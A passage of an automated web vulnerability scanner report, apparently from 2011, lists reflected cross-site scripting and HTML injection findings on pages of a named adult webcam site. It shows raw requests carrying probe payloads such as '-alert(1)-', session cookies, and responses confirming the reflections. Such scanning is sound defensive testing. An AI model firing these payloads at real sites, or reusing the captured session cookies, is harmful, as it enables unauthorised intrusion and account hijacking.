Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:39 GMT
Connection: close
Content-Length: 70611
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.521. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:25 GMT
Connection: close
Content-Length: 70405
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1">
...[SNIP]...

4.522. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:15 GMT
Connection: close
Content-Length: 22814
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.523. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:38 GMT
Connection: close
Content-Length: 22962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.524. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:50 GMT
Connection: close
Content-Length: 119446
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1">
...[SNIP]...

4.525. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:07 GMT
Connection: close
Content-Length: 119630
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.526. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:42 GMT
Connection: close
Content-Length: 33699
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.527. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:33 GMT
Connection: close
Content-Length: 33515
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1">
...[SNIP]...

4.528. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:03 GMT
Connection: close
Content-Length: 25443
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.529. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

